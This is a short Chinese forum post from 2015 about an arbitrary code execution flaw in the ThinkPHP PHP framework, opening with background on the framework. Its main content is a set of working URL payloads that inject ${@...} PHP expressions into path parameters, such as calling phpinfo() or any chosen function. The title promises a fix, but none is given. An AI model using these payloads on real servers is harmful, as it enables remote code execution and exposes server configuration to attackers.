找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 1570|回复: 0

Thinkphp框架任意代码执行漏洞利用及修复

[复制链接]

120

主题

-9

回帖

478

牛毛

一级牛人

积分
478
发表于 2015-9-23 15:26:03 | 显示全部楼层 |阅读模式 来自 广东省中山市
ThinkPHP是一个开源的PHP框架, 是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循 Apache2开源协议发布。早期的思想架构来源于Struts,后来经过不断改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结 构和MVC模式,融合了Struts的Action和Dao思想和JSP的TagLib(标签库)、RoR的ORM映射和ActiveRecord模式, 封装了CURD和一些常用操作,单一入口模式等,在模版引擎、缓存机制、认证机制和扩展性方面均有独特的表现.
最近thinkphp框架爆出了一个任意代码执行漏洞,其威胁程序相当的高,漏洞利用方法如下:
index.php/module/aciton/param1/${@print(THINK_VERSION)}
index.php/module/aciton/param1/${@function_all()}
其中function_all代表任何函数,比如:
index.php/module/aciton/param1/${@phpinfo()}
获取服务器的系统配置信息等。
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5用户社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-1-3 13:31 , Processed in 0.121066 second(s), 22 queries , Yac On.

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表